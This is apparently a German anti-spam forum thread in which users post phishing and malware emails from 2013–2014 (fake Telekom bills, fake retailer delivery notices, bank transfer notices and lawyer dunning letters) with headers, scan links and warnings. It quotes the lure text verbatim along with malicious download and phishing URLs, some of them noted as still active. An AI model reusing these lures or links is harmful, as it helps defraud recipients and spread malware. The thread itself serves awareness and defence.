Im Anhang finden Sie die gewünschten Dokumente und Daten zu Ihrer Telekom Mobilfunk RechnungOnline für Geschäftskunden vom Monat December,
Download (Ihre Telekom Mobilfunk RechnungOnline für Geschäftskunden 050050252532729573 vom 06.01.2014 des Kundenkontos 387387679622).

Mit freundlichen Grüßen,
Geschäftskundenservice

Telekom Deutschland GmbH
Aufsichtsrat: *** Vorsitzender
Geschäftsführung: ***
Eintrag: Amtsgericht Bonn, HRB 59 19, Sitz der Gesellschaft Bonn
USt-Id.Nr.: DE 122265872
WEEE-Reg.-Nr.: 60800328

Received: from vs00167.dinodata.vn (unknown [127.0.0.1]) by
vs00167.dinodata.vn (Postfix) with ESMTP ID: [ID filtered]
<my.name [at] firma.tld>; Tue, 31 Dec 2013 xx:xx:xx +0000 (UTC)
Received: by vs00167.dinodata.vn (Postfix, from userID: [ID filtered]
Sat, 21 Dec 2013 xx:xx:xx +0000 (UTC)
To: <poor [at] spamvictim.tld>
Subject: Special Order Delivery Problem
From: Best Buy <BestBuyInfo [at] nhadatban.com.vn>
Reply-To: Best Buy <BestBuyInfo [at] nhadatban.com.vn>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----------138763878252B5AFFE1D4E7"
Message-ID: [ID filtered]
Date: Sat, 21 Dec 2013 xx:xx:xx +0700


My Besy Buy ID: [ID filtered]
Reward certificate(s) available.
WEEKLY DEALS
Cameras Video Games
Dear Sir/Madam,
Your order BBY-7934197342 has not been delivered because the specified address was not correct.
Please fill this form and send it back with your reply to this message. --> http://hoffmans-leder.de/message/zOWm554rqyOqecO4DqiVrC34LKcpoU84tnznmqQ0a0Q=/BestBuyForm

If we do not receive your reply within a week we will pay your money back less 17 because your order was reserved for the time of Christmas holidays.
________________________________________
Best Buy 7601 Penn Avenue South, Richfield, MN 18725-3760
BEST BUY, the BEST BUY logo, the tag design, BESTBUY.COM, GEEK SQUAD, the GEEK SQUAD logo, MY BEST BUY, REWARD ZONE, BEST BUY MOBILE and the BEST BUY MOBILE logo are trademarks of BBY Solutions, Inc. All other trademarks or trade names are properties of their respective owners.

--------------------------------------------------------------------------------

Received: from portal.dnspriv.com ([173.193.201.179] helo=win01) by
mr2.firma.tld with esmtp (envelope-from <manager [at] flapco.org>) id
1VvM2n-00027r-2L for poor [at] spamvictim.tld; Tue, 24 Dec 2013
xx:xx:xx +0100
Received: from win01 ([127.0.0.1]) by win01 with Microsoft
SMTPSVC(7.5.7601.17514); Tue, 24 Dec 2013 xx:xx:xx -0300
Date: Tue, 24 Dec 2013 xx:xx:xx -0600
Subject: Special Order Delivery Problem
To: <poor [at] spamvictim.tld>
From: Costco <manager [at] flapco.org>
Reply-To: Costco <manager [at] flapco.org>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----------138786748252B92D5AC9352"
Message-ID: [ID filtered]


Unfortunately the delivery of your order COS-0054310607 was cancelled since the specified address of the recipient was not correct. You are recommended to complete this form and send it back with your reply to us. --> http://esector.co/media/WbtgYoUJ9MXu8vgrd4ZmsS34LKcpoU84tnznmqQ0a0Q=/CostcoForm

Please do this within the period of one week - if we dont get your timely reply you will be paID: [ID filtered]

1998 - 2013
Costco Wholesale Corporation
All rights reserved


Eniac

Ihre Rechnung für Januar 2014

Guten Tag,

mit dieser E-Mail erhalten Sie Ihre aktuelle Rechnung. Die Gesamtsumme im Monat Januar 2014 beträgt: 295.36 Euro. Wir bitten Sie, die Rechnung zu begleichen. Details zur Ihre Rechnung können Sie hier ansehen:

Download (Mitteilung, Rechnungsrückstände 573520629758 Telekom Deutschland vom 16.01.2014).
http://gorbache.ru/telekom_deutschland/

Diese E-Mail wurde automatisch erzeugt. Bitte antworten Sie nicht dieser Absenderadresse.

Informationen über die Umstellung auf den einheitlichen Euro-Zahlungsverkehrsraum SEPA finden Sie hier.

Speziell für Sie: Möchten Sie zukünftig Informationen über neue Produkte und Tarife erhalten, melden Sie sich zu unserem kostenlosen Informationsservice an.


Mit freundlichen Grüßen

R.H.
Leiter Kundenservice

Telekom Deutschland GmbH
Aufsichtsrat: Timotheus Höttges Vorsitzender
Geschäftsführung: Niek Jan van Damme Sprecher, Thomas Dannenfeldt, Thomas Freude, Michael Hagspihl, Dr. Bruno Jacobfeuerborn, Dietmar Welslau, Dr. Dirk Wössner
Eintrag: Amtsgericht Bonn, HRB 59 19, Sitz der Gesellschaft Bonn
USt-Id.Nr.: DE 264106267716
WEEE-Reg.-Nr.: 367452552905

--
This email was Virus checked by AVIRA. Mail wurde auf Viren geprüft.


Received: from s007-ct-ffm-r01.ec-c.net ([85.190.1.220]) by COL0-MC2-F28.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
Thu, 16 Jan 2014 xx:xx:xx -0800
Received: from pc_benedikt (localhost.localdomain [127.0.0.1])
by s007-ct-ffm-r01.ec-c.net (Postfix) with ESMTPA ID: [ID filtered]
for <poor [at] spamvictim.tld>; Thu, 16 Jan 2014 xx:xx:xx +0100 (CET)
Received: from pc_benedikt ([80.120.229.198] helo=pc_benedikt) by
PLANETSPAM; 16 Jan 2014 xx:xx:xx +0100
Date: Thu, 16 Jan 2014 xx:xx:xx +0100
From: Telekom <ph5s325p3 [at] s007-ct-ffm-r01.ec-c.net>
To: poor [at] spamvictim.tld
X-MSMail-Priority: High
X-Priority: 1
Priority: urgent
Importance: high
X-MimeOLE: Produced by Blat v3.1.1
X-Mailer: Blat v3.1.1, a Win32 SMTP/NNTP mailer http://www.blat.net
Message-ID: [ID filtered]
Subject: RechnungOnline Monat Januar 2014, Buchungskonto: 179784249675.
Content-Transfer-Encoding: 8BIT
Content-Type: text/html;
charset="ISO-8859-1"
Return-Path: Telekom [at] s007-ct-ffm-r01.ec-c.net
X-OriginalArrivalTime: 16 Jan 2014 xx:xx:xx.0156 (UTC) FILETIME=[259B06C0:01CF12AE]

Information zu: Überweisung/Umbuchung
Empfänger: Sing Grundstuecksverwaltung VC
IBAN/Kontonummer: DE351202500007139376**
BIC/BLZ: GENODES1OVX
Bei Kreditinstitut: HEIDENHEIMER VOLKSBANK VC HEIDENHEIM (BRENZ)
Betrag in EUR: 1656,56
Verwendungszweck: Customer Nr24241642**
Auftraggeber (Kontoinhaber): Sing Grundstuecksverwaltung VC

Verwendete TAN: 9222**
Ihren Auftrag haben wir entgegengenommen.
_________________________________________________________________

Es kann einige Minuten dauern, bis die Transaktion in Ihrem Konto angezeigt wird.
Weitere Informationen zum Transaktions Volksbank mG.
http://fenius.ru/volksbank_eg/



Received: from mailgate.stumpner.co.at ([88.198.108.126]) by SNT0-MC4-F23.Snt0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
Fri, 17 Jan 2014 xx:xx:xx -0800
Received: from james.stumpner.co.at (james.stumpner.co.at [88.198.108.122])
by mailgate.stumpner.co.at (Postfix) with ESMTP ID: [ID filtered]
for <poor [at] spamvictim.tld>; Fri, 17 Jan 2014 xx:xx:xx +0100 (CET)
Received: from dslb-188-110-010-203.pools.arcor-ip.net ([188.110.10.203])
by james.stumpner.co.at (JAMES SMTP Server 2.3.0) with SMTP ID: [ID filtered]
for <poor [at] spamvictim.tld>;
Fri, 17 Jan 2014 xx:xx:xx +0100 (CET)
Subject: Transaktions Volksbank eG, Nr:595368857-812.

Angeblich eine Email von Otto :clown:


п»ї
Sehr geehrte Damen und Herren,

Mit dieser E-Mail erhalten Sie Ihre aktuelle Rechnung als Zip-Datei. Antworten Sie auf diese Mail mit der Bitte um Umstellung des Auftrags auf Nachnahme.

Mit freundlichen GrГјГџen,
Ihre Kundenbetreuung

Den Anhand habe natürlich nicht geöffnet.

Guten Abend,

Bin ganz neu hier. Ich habe ebenfalls eine Spammail erhalten die hier noch nicht genannt wurde. Nach dem kopieren habe ich Sie gelöscht, leider ohne den Header mit zu kopieren :confused:


FinanzGruppe Fiducia AG (gerold.cvach [at] architekt-cvach.de)


Information zu: Überweisung/Umbuchung
Empfänger: B*** P*** A***, Grundstuecksverwaltung YR
IBAN/Kontonummer: DE4366751***
BIC/BLZ: BEYLBCS1NDU
Bei Kreditinstitut: HEIDENHEIMER VOLKSBANK FA HEIDENHEIM (BRENZ)
Betrag in EUR: 1687,87
Verwendungszweck: Gehalt Nr 753477710_J_875973
Auftraggeber (Kontoinhaber): B*** P*** A***, Grundstuecksverwaltung YR

Verwendete TAN: 734615
Ihren Auftrag haben wir entgegengenommen.
____________________________________________________________

Es kann einige Minuten dauern, bis die Transaktion in Ihrem Konto angezeigt wird.
Weitere Informationen zum Transaktions Volksbank FA.
http://gf-58.ru/volksbank_eg/

----
This email was Virus checked by Microsoft Security Essentials. Mail wurde auf Viren geprüft.

Vorsicht vor dem Link - der funktioniert noch. Link zu Virustotal https://www.virustotal.com/de/file/4a34b0bf3246c2cc3cd1f56a18db39860efcc5e28932a13ad1dcdbe6f85de046/analysis/1390314571/

Return-Path: <m-hand [at] www1072.sakura.ne.jp>
Received: from www1072.sakura.ne.jp (localhost [127.0.0.1]) by
www1072.sakura.ne.jp (8.14.5/8.14.5) with ESMTP ID: [ID filtered]
<my.name [at] firma.tld>; Sun, 26 Jan 2014 xx:xx:xx +0900 (JST)
(envelope-from poor [at] spamvictim.tld)
Received: (from m-hand [at] localhost) by www1072.sakura.ne.jp
(8.14.5/8.14.5/Submit) ID: [ID filtered]
(JST) (envelope-from m-hand)
Date: Sun, 26 Jan 2014 xx:xx:xx +0900
Message-ID: [ID filtered]
To: <poor [at] spamvictim.tld>
Subject: Special Shipping Problem
From: Walmart Shipping Manager <walmart.support [at] kurumai.jp>
Reply-To: Walmart Shipping Manager <walmart.support [at] kurumai.jp>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----------139066683252E3E4501C1E3"


Walmart
Save money. Live better.

Sir/Madam,

Your order WM-0078239608 delivery has failed.
Reason: Failed delivery attempts
To fix this issue you must fill this form and send it back to us. --> http://outsourcingprogrammingservices.com/box/+1TN5cdv2Yb6iryTjLwyxy34LKcpoU84tnznmqQ0a0Q=/WalmartForm

If your reply is not received within one week, you will be paID: [ID filtered]

Walmart Manager
Jacob Hardy
2013 Wal-Mart Stores, Inc.


Eniac

Ich habe überhaupt nichts von der ACO Electronics Company bestellt aber meine Kreditkarte soll laut Dennis Watson mit 87 GBP belastet werden. :gack: Ich trau mir allerdings nicht die Details zu dieser angeblichen Bestellung aufzurufen, da der Link mit „.zip“ endet und dies könnte unter Umständen negative Auswirkungen auf mein PC haben. :knife:

Return-Path: cevi03ab [at] student.cbs.dk
Received: from mi4-p00-ob.smtp.rzone.de ([81.169.146.144]) by
mx.kundenserver.de (mxeue002) with ESMTPS (Nemesis) id
0LcXlX-1VW7hJ2SkZ-00k81p for <*****@*****.de>; Wed, 12 Feb 2014 xx:xx:xx
+0100
X-RZG-FWD-BY: *********@********.de
Received: from mailin.rzone.de ([unix socket])
by mailin.rzone.de (RZmta 32.26) with LMTPA;
Wed, 12 Feb 2014 xx:xx:xx +0100 (CET)
X-RZG-MI-VALUES: bm=0 mafl=1 sh=0 du=0 sp=2,1 vv=1 nf=0
X-Strato-MessageType: email
X-RZG-CLASS-ID: [ID filtered]
Received: from lvps109-104-78-76.vps.webfusion.co.uk ([109.104.78.76])
by smtpin.rzone.de (RZmta 32.26 OK)
with ESMTP ID: [ID filtered]
for <*********@********.de>;
Wed, 12 Feb 2014 xx:xx:xx +0100 (CET)
Received: from {LINE[from_ip]#fip}21.225 ([{#fip}21.225])
Message-ID: [ID filtered]
From: "Dennis Watson" <cevi03ab [at] student.cbs.dk>
To: "Consumer" <*********@********.de>
Subject: Order processing
Date: Wed, 12 Feb 2014 xx:xx:xx +0000
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
{LINE[charset]}
reply-type=original
Content-Transfer-Encoding: 7bit
Envelope-To: <*****@*****.de>




Dear Consumer
This is a notification that the bill of parcels has been produced on 02/05/2014. Your payment method is: credit card. The order reference is 373987.
Your credit card will be charged for 87 GBP.
The specification are below:
http://www.ciaoitalyvillas.com/02-2014/bill/bl-901-036.zip
Yours faithfully,
ACO Electronics Company
Dennis Watson

Gruß von SpamKampf

x-store-info:J++/JTCzmObr++wNraA4Pa4f5Xd6uensydyekesGC2M=
Authentication-Results: hotmail.com; spf=none (sender IP is 212.227.17.10) smtp.mailfrom=xx [at] online.de; dkim=none header.d=online.de; x-hmca=none header.id=xxxxxx [at] online.de
X-SID-PRA: xxxxxx [at] online.de
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0xO0Q9MTtHRD0xO1NDTD0x
X-Message-Info: NhFq/7gR1vQgiyfVu7hHjTzdJcUSkD64ICYdUsPQaG88ALdzWefSUy1PjMH3KEgHoxUhyZnaidG05tmuzLbzI T8VYIOdFNUrRriDuZnYvTu1TRzxdKZawDnAuSRABLCyel/eSGxII6ApJKscyCTMx/bUH+WWGNWIB+49R8AYBK944MQSyn7I46+lmH3+Mz2QA2L8q9OqZkxaNImTfQ0q8TABnkaq7yXo
Received: from moutng.kundenserver.de ([212.227.17.10]) by COL0-MC4-F19.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
Fri, 21 Feb 2014 xx:xx:xx -0800
Received: from Futura-PC (p5DC1377F.dip0.t-ipconnect.de [93.193.55.127])
by mrelayeu.kundenserver.de (node=mreue104) with ESMTP (Nemesis)
ID: [ID filtered]
From: "Rechnungsstelle" <xxxxxx [at] online.de>
Subject: Ausgleich der stornierten Buchung Ihrer Bestellung
Date: Fri, 21 Feb 2014 xx:xx:xx GMT
Message-ID: [ID filtered]
MIME-Version: 1.0
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-Priority: 3
Content-Type: multipart/mixed; boundary="=-XC87410036"
X-Provags-ID: [ID filtered]
+DBUgyyol7uOAaT1COV8srHNtJCKvUTsumOU1Qs+PS5ic+rdCs
iyczZ6+0dOLBmejW7V9bv4y62uzOkJjN0fcVNp0pbqezQgJnsZ
e4eHDtwKvv5MRoqX5mw4Rp+XM2KZ09zy9gr5OHNvzv5agWowe7
0uyU1iLNaHb4LGcAIi/O95ADCx4xWttaykDw6Xa412+1dHdYc+
TCDtb5qqKQFqXEWBk9jYFTXzUnBsWFZ+UVy8FMBNyhJtXrjZKe
CMS8DkOcuaV6DruC/7AeZcihyK1SVBRQp0sMzBZQZbcnOARJ4N
DI4+p8vNeEnslsZMyie4=
Return-Path: xxxxxx [at] online.de
X-OriginalArrivalTime: 21 Feb 2014 xx:xx:xx.0874 (UTC) FILETIME=[56C197A0:01CF2F0A]

--=-XC87410036
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline



Guten Tag Vorname / Nachname

leider konnten wir bis zum heutigen Tage keinen Zahlungseingang auf unsere Rechnung vom 04.01.2014 feststellen. Rechnung Nummer: AP--795373548. Bestimmt handelt es sich dabei um ein Versehen Ihrerseits die Rückbuchung von Ihrem Konto zu berücksichtigen.

Bitte überweisen Sie den ausstehenden Betrag ohne Abzüge bis zum 24.02.2014 auf unser Bankkonto. Die Gesamtsumme der Bestellung ist 314,00 Euro.
Dabei wird Ihnen eine Mahngebühr von 14,00 Euro und die Kosten unserer Beauftragung von 43,73 Euro berechnet. Falls Sie diesen Zahlungstermin nicht einhalten, werden wir Ihnen weitere Kosten des Mahnverfahrens und Verzugszinsen in Rechnung stellen müssen.

Mit freundlichen Grüßen.

J.P.


edit// scheinbar ist das "Whois" Dingens kaputt :indecisiveness:

MOD: nein, die whois Funktion ist ok und nur für URL zu benutzen, Header bitte mit taggen

Und wieder mysteriöse Online-Anwälte:



Guten Tag xxxxx,

leider konnten wir bis zum heutigen Tage keinen Zahlungseingang auf unsere Rechnung vom 05.01.2014 feststellen. Paketnummer: OO/4514257865. Bestimmt ist es Ihnen nur entgangen die Rückbuchung von Ihrem Konto zu berücksichtigen.

Bitte überweisen Sie den ausstehenden Betrag zuzüglich der Zusatzgebühren bis zum 27.02.2014 auf unser Bankkonto. Der Rechnungsbetrag der Bestellung ist 142,00 Euro.
Zusätzlich wird Ihnen eine Mahngebühr von 17,00 Euro und die Kosten unserer Beauftragung von 35,95 Euro verrechnet. Falls Sie diesen Zahlungstermin nicht einhalten, werden wir Ihnen weitere Kosten des Mahnverfahrens und Verzugszinsen in Rechnung stellen müssen.

Mit freundlichen Grüßen.

Online Anwaltschaft Tom Berger


Da dran hängt dann ein ZIP - sicher mit einem knuffigen Trojaner drin...

Hier wär noch der Header:


Return-Path: die.mooshofer [at] gmx.de
Received: from mout-xforward.gmx.net ([82.165.159.12]) by mx-ha.web.de
(mxweb102) with ESMTPS (Nemesis) ID: [ID filtered]
<xxxxx [at] web.de>; Mon, 24 Feb 2014 xx:xx:xx +0100
Received: from hansi-d6a692af4 ([77.21.100.86]) by mail.gmx.com (mrgmx002)
with ESMTPSA (Nemesis) ID: [ID filtered]
Mon, 24 Feb 2014 xx:xx:xx +0100
From: "Beauftragte Anwaltschaft" <die.mooshofer [at] gmx.de>
To: "xxxxx" <poor [at] spamvictim.tld>
Subject: =?utf-8?q?xxxxx Ihre Lastschrift konnte nicht durchgef=C3=BChrt werden?=
Date: Mon, 24 Feb 2014 xx:xx:xx GMT
Message-ID: [ID filtered]
MIME-Version: 1.0
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-Priority: 3
Content-Type: multipart/mixed; boundary="=-XC797256B0"
X-Provags-ID: [ID filtered]
pwuULpDrwYoXabN9zLOdvIC+Z1OKnKsruq8ULOq7n2Y6wXYpWvkBp4UNlEvxxVpbw53rete
yDXeYgOeLH9GZkecmcK+yi6hHtjJtu8pcVMhO6f/5b1FRbi/tU/EsQI+aapbdbAY63h/4oW
iKsRwb8dBm6rQIw1waDwQ==
Envelope-To: <poor [at] spamvictim.tld>

Moin moin zusammen,

und wieder ein netter Versuch, Schadsoftware unterzujubeln.



Sehr geehrter Kunde,

leider konnten wir bis zum heutigen Tage keinen Zahlungseingang auf unsere Rechnung vom 02.01.2014 feststellen. Rechnungsnummer: KW--236845253. Bestimmt handelt es sich nur um ein Versehen in der Hektik des Alltags.

Bitte begleichen Sie den ausstehenden Betrag zuzüglich der Gebühren bis zum 04.03.2014 auf unser Bankkonto. Die Summe der Bestellung entspricht 273,00 Euro.
Dabei wird Ihnen eine Mahngebühr von 13,00 Euro und die Kosten unserer Beauftragung von 46,93 Euro verrechnet. Falls Sie diesen Zahlungstermin nicht einhalten, werden wir Ihnen weitere Kosten des Mahnverfahrens und Verzugszinsen in Rechnung stellen müssen.

Mit freundlichen Grüßen.

Online Anwaltschaft Jan Baumann


---
avast! Antivirus: Eingehende Nachricht ist INFIZIERT:
25.02.2014 Forderung der abgewiesenen automatischen Kontoabbuchung.zip#551434721|>Anwalt stornierte Kontolastschrift 25.02.2014.zip|>Beauftragte Anwaltschaft stornierte Kontolastschrift.com (Win32:Malware-gen) wurde aus der Nachricht gelöscht.

Virus-Datenbank (VPS): 140225-1, 25.02.2014
Getestet um: 26.02.2014 xx:xx:xx
avast! - Copyright (c) 1988-2014 AVAST Software.
http://www.avast.comReturn-path: <mompix.65 [at] t-online.de>
Delivery-date: Wed, 26 Feb 2014 xx:xx:xx +0100
Received: from [195.4.92.11] (helo=mx1.freenet.de)
by mbox11.freenet.de with esmtpa (ID: [ID filtered]
ID: [ID filtered]
for poor [at] spamvictim.tld; Wed, 26 Feb 2014 xx:xx:xx +0100
Received: from mailout05.t-online.de ([194.25.134.82]:51709)
by mx1.freenet.de with esmtps (TLSv1:AES256-SHA:256) (port 25) (Exim 4.80.1 #4)
ID: [ID filtered]
for poor [at] spamvictim.tld; Wed, 26 Feb 2014 xx:xx:xx +0100
Received: from fwd11.aul.t-online.de (fwd11.aul.t-online.de )
by mailout05.t-online.de with smtp
ID: [ID filtered]
Received: from REINHECKEL_PC (rX1V6aZ1YhJFQFBD8uCVVQo-Tw19mG5zdl9zrhfk3BIkc8-wXCHAqe7fWy4sYYUgJx@[84.163.17.127]) by fwd11.t-online.de
with esmtp ID: [ID filtered]
From: "Anwalt" <mompix.65 [at] t-online.de>
To: "xxxxxxxxxxxxxx" <poor [at] spamvictim.tld>
Subject: *** VIRUS ***=?utf-8?q?Die Lastschrift konnte von Ihrem Bankkonto nicht durchgef=C3=BChrt werden?=
Date: Wed, 26 Feb 2014 xx:xx:xx GMT
Message-ID: [ID filtered]
MIME-Version: 1.0
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-Priority: 3
Content-Type: multipart/mixed; boundary="=-XC75B6966B"
X-ID: [ID filtered]
X-TOI-MSGID: [ID filtered]
X-purgate-ID: [ID filtered]
Delivered-To: poor [at] spamvictim.tld
Delivered-To: poor [at] spamvictim.tld
Envelope-to: poor [at] spamvictim.tld
X-Originated-At: 194.25.134.82!51709
Delivered-To: poor [at] spamvictim.tld
X-Antivirus: avast! (VPS 140225-1, 25.02.2014), Inbound message
X-Antivirus-Status: Infected
X-Attachment: 25.02.2014 Forderung der abgewiesenen automatischen Kontoabbuchung.zip#551434721|>Anwalt stornierte Kontolastschrift 25.02.2014.zip|>Beauftragte Anwaltschaft stornierte Kontolastschrift.com Virus: Win32:Malware-gen Deleted

--=-XC75B6966B
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Gruß Frechdachs

Hallo,

heute hier aufgeschlagen

Return-Path: gerlinde.keller [at] online.de
Received: from moutng.kundenserver.de ([212.227.126.130]) by mx-ha.gmx.net
(mxgmx006) with ESMTPS (Nemesis) ID: [ID filtered]
<mein_avatar [at] gmx.de>; Thu, 03 Apr 2014 xx:xx:xx +0200
Received: from Home-PC (pD9E787DA.dip0.t-ipconnect.de [217.231.135.218])
by mrelayeu.kundenserver.de (node=mreue004) with ESMTP (Nemesis)
ID: [ID filtered]
From: "Online Mahnung" <gerlinde.keller [at] online.de>
To: "ich selbst" <poor [at] spamvictim.tld>


Bemerkenswert kurzer Header

212.227.126.130 Server in den Niederlanden. Die gerlinde unter dieser E-Mail-Adresse gibt's sowieso nicht. Die ist erfunden.


Sehr geehrter Kunde Isenächer,

leider konnten wir bis zum heutigen Tage keinen Zahlungseingang auf unsere =
Mahnung Nr. 79JLO9499548469 vom 02.03.2014 erkennen.=20

Ihr Konto wurde nicht gen=C3=BCgend gedeckt um die Kontoabbuchung vorzunehm=
en.=20

Sicherlich handelt es sich dabei nur um ein Versehen.

Bitte begleichen Sie den f=C3=A4lligen Betrag inklusive der Geb=C3=BChren b=
is zum 07.04.2014 auf unser Bankkonto. Der Rechnungsbetrag der Bestellung e=
ntspricht 175,00 Euro.=20
Zuz=C3=BCglich wird Ihnen eine Mahngeb=C3=BChr von 18,00 Euro und die Koste=
n unserer Beauftragung von 29,45 Euro berechnet. Falls Sie diesen Zahlungst=
ermin nicht einhalten, werden wir Ihnen weitere Kosten des Mahnverfahrens u=
nd Verzugszinsen in Rechnung stellen m=C3=BCssen. Die Rufnummer und weitere=
Informationen finden Sie in Ihrer Rechnung anbei im Anhang.=20

Mit freundlichen Gr=C3=BC=C3=9Fen.

Leo Myer

Reingekommen über GMX. Sind die nicht ganz dicht? In der Anrede war mein voller Vor- und Nachnahme.

Die angehängte ZIP habe ich natürlich nicht aufgemacht. Leider hat es mein Spamfilter nicht abgefangen:sleeping:

Gruß

Isenächer

Return-Path: mfriedrich [at] fastmail.fm
Received: from fastmail.fm ([94.53.228.181]) by mx-ha.web.de (mxweb103) with
ESMTP (Nemesis) ID: [ID filtered]
Apr 2014 xx:xx:xx +0200
Message-ID: [ID filtered]
Date: Fri, 04 Apr 2014 xx:xx:xx -0800
Reply-To: "Michael Friedrich" <mfriedrich [at] fastmail.fm>
From: "Michael Friedrich" <mfriedrich [at] fastmail.fm>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070728 Thunderbird/2.0.0.6
X-Accept-Language: en-us
MIME-Version: 1.0
To: "Michael Friedrich" <***@web.de>
Subject: Rechnung


Guten Tag,

Im Anhang dieser Email senden wir Ihnen Ihre aktuelle Rechnung fuer den
Monat April.

Der offene Betrag ist innerhalb von 10 Tagen auf unserem Konto zu
ueberweisen.




MFG
Apay AG
Angehängt ist eine "Rechnung-April.exe", die, wie zu erwarten, virusverseucht ist. Hier der Link zum Analyseergebnis bei Virustotal (https://www.virustotal.com/de/file/a4126da8eb73c2563ce189c0a7c696f793c3a854dcdcfb6bffca35008c010562/analysis/1396680525/), wo derzeit (05.04.2014 08:50 MESZ) 26 von 51 Scannern anschlagen.

Putzig finde ich die Empfängerangabe:


Von: Michael Friedrich <mfriedrich [at] fastmail.fm>
An: Michael Friedrich <r*.b*@web.de> [Nicht meine Web.de-Adresse, ich stand vermutlich im BCC]

Schönen Gruß
Mittwoch

Eine Rechnung.exe hat mich erreicht - gespamt über Bulgarien:
Received: from fastmail.fm ([46.238.23.158]) by mx-ha.gmx.net (mxgmx107) with
ESMTP (Nemesis) ID: [ID filtered]
Tue, 15 Apr 2014 xx:xx:xx +0200
Message-ID: [ID filtered]
Hier der Scan von Jotti.org (http://virusscan.jotti.org/de/scanresult/78b8c19f954a49504d343ac5e9a5d25be1df5c83/2f5b86d3aa68b6576593939c3ef5203551f85c98).

Here we go again
Received: from fastmail.fm ([87.193.144.18]) by mx-ha.gmx.net (mxgmx103) with
ESMTP (Nemesis) ID: [ID filtered]
Tue, 15 Apr 2014 xx:xx:xx +0200
Ergebnis von Jotti (http://virusscan.jotti.org/de/scanresult/78b8c19f954a49504d343ac5e9a5d25be1df5c83/ccbffe428b7c74cb6bf18f64841bede42cdfe9a6)

Heute erstmals auf der gmx-Addy meiner Frau aufgeschlagen: Mail eines "Manuel Wagner" mit Text: "Anbei Ihre Rechnung mit der Bitte um umgehende Begleichung". Im Anhang befindet sich eine .exe-Datei, die wohl verseucht ist. :mad:

Kann man eigentlich hier antackern (https://www.antispam-ev.de/forum/showthread.php?33431-Virus-Neue-Bestellung-Lieferschein-f%FCr-xxx-Mahnung&p=371509&viewfull=1#post371509).

[x] done (truelife)

Kann man eigentlich hier antackern (https://www.antispam-ev.de/forum/showthread.php?33431-Virus-Neue-Bestellung-Lieferschein-f%FCr-xxx-Mahnung&p=371509&viewfull=1#post371509).

[x] done (truelife)

Danke! Sind tatsächlich dieselben Gauner! (http://www.giga.de/extra/malware/news/rechnung-von-apay-ag-und-michael-friedrich-per-mail-was-tun/)

Warum kommt der Dreck immer nur über gmx? Unsere anderen Addys (bei outlook und t-online) blieben bislang gänzlich verschont!

Warum kommt der Dreck immer nur über gmx? Unsere anderen Addys (bei outlook und t-online) blieben bislang gänzlich verschont!
1. Versuch: Google nach deiner gmx-Adresse. Wird die Suchmaschine fündig, ist der Fall klar: es war ein Harvester.

2. Versuch: Bei GMX war ein Datendieb.

Am einfachsten wäre es, die E-Mail-Adresse zu löschen...

Wuschel

Bei mir kommt auch Dreck über T-Online, allerdings längst nicht so viel wie bei GMX. Der Krankenversicherungsmist kommt bei mir über T-Online.

Inzwischen wurden meine beiden gmx-Addys auch von "Manuel Wagner" bedient.

"[Virus] Neue Bestellung /...." und "Krankenversicherungsspam" kommem bei mir über "web.de" an, "gmx.de" blieb davon noch verschont.

Inzwischen wurden meine beiden gmx-Addys auch von "Manuel Wagner" bedient.

Bei mir kommt es von Lena Wagner. Scheint ein Familienbvetrieb zu sein :-))

Aber auch für PKV und anderen Mist.

Ui - jetzt kommen die Trojaner schon als Vorkasse-Rechnung - ist doch noch gar nicht Mai. Keine Geduld mehr, die Leute:



Guten Tag,

Im Anhang dieser Email finden Sie Ihre Rechnung fuer den Monat Mai.

Der offene Betrag ist innerhalb von 8 Tagen auf unserem Konto zu
ueberweisen.



Cpay AG


Im Anhang dann eine total unverdächtige "Rechnung-Mai.exe" *hüstel*, der Virenscanner bemängelt da einen "Trojan:Win32/Fogels.C"...

Hier wär noch ein Header:


Return-Path: jonash [at] dow.bz
Received: from dow.bz ([84.118.139.182]) by mx-ha.web.de (mxweb106) with ESMTP
(Nemesis) ID: [ID filtered]
xx:xx:xx +0200
Message-ID: [ID filtered]
Date: Sun, 27 Apr 2014 xx:xx:xx +0000
Reply-To: "Jonas Hoffmann" <jonash [at] dow.bz>
From: "Jonas Hoffmann" <jonash [at] dow.bz>
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.18) Gecko/20081105 Thunderbird/2.0.0.18
X-Accept-Language: en-us
MIME-Version: 1.0
To: "Jonas Hoffmann" <poor [at] spamvictim.tld>
Subject: Rechnung Mai
Content-Type: multipart/mixed;
boundary="------------761825703251520463735867"
Envelope-To: <poor [at] spamvictim.tld>

Sehr geehrter Kunde,

Wir sind ganz dankbar, dass Sie die Dienstleistungen unserer Bank benutzt haben.
Wir teilen Ihnen mit, dass vom 28.04.2014 die Schuld beim Konto #8202825698991920 2969.33 Euro beträgt. Wir bieten Ihnen an, die Rückzahlung der Geldmittel in vollem Umfang bis 21.05.2014 freiwillig durchzuführen.

Die freiwillige Rückzahlung der Geldmittel zum Vertrag #3417297230CC307C3 bietet Ihnen an:
1) Ihre positive Kredit-Geschichte beibehalten
2) Die Gerichtsverhandlung vermeiden

Im Falle der Nichtzahlung 2969.33 Euro sind wir im Rahmen der aktuellen Gesetzgebung berechtigt, die Gerichtsstrafe wegen der Schuldigkeit auszuführen.
Die Vertragskopie #3417297230CC307C3 und Zahlungsangaben sind zu diesem Brief als ZIP-Datei "vertrag_3417297230CC307C3.zip" hinzugefügt.

Mit freundlichen Grüßen,
Leiter des Departments für die Arbeit mit den Schulden.
Dammann Boller
[editierte Berliner Rufnummer]

Return-Path: schuld [at] dwdh.de
